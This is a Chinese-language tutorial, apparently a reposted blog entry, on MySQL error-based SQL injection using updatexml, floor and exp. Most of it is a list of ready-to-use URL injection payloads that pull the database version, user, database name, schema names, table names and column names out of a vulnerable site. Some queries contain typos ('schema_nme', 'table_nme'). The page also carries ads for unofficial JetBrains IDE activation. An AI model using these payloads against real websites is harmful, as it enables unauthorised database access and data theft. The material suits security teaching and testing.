mysql报错注入_mysql报错注入[通俗易懂]

mysql报错注入_mysql报错注入[通俗易懂]报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(selectversion()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1’+…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

报错注入

这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。

1.updatexml

updatexml的报错原理从本质上来说就是函数的报错。

select updatexml(1,concat(0x7e,(select version()),0x7e),1);

这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:

爆破数据库版本信息

?id=1′ +updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

?id=1′ and updatexml(1,concat(0x7e,(select version()),0x7e),1) –+

其中0x7e是ASCII编码,解码结果。

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前用户

?id=1′ and updatexml(1,concat(0x7e,(select user()),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前使用的数据库

?id=1′ and updatexml(1,concat(0x7e,(select database()),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破数据库中的库名

?id=1′ and updatexml(1,concat(0x7e,(select schema_nme from information_schema.schemata limit 0,1),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破表名

?id=1′ and updatexml(1,concat(0x7e,(select table_nme from information_schema.tables where table_schema= ‘test’ limit 0,1),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

其他功能的Payload可以参照下面floor的使用方法来修改。

2.floor

爆破数据库版本信息

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前用户

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前使用的数据库

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破指定表的字段(下面以表名为emails举例说明)

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

注意,这里我们采用的是十六进制编码后的表名。如果想采用非十六进制编码的表名则需要添加引号,但是这时候有可能会出现单引号导致的报错。

这这里,我们只演示爆破数据库版本的Payload,关于其他Payload,可自行研究并复现。

3.exp

接下来是exp函数报错,exp()报错的本质原因是报错。我们可以在MySQL中进行。

select exp(~(select * from (select user())x));

同样使用前面的例子,Payload为。

?id=1′ and exp(~(select * from (select user())x))%23

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/187426.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号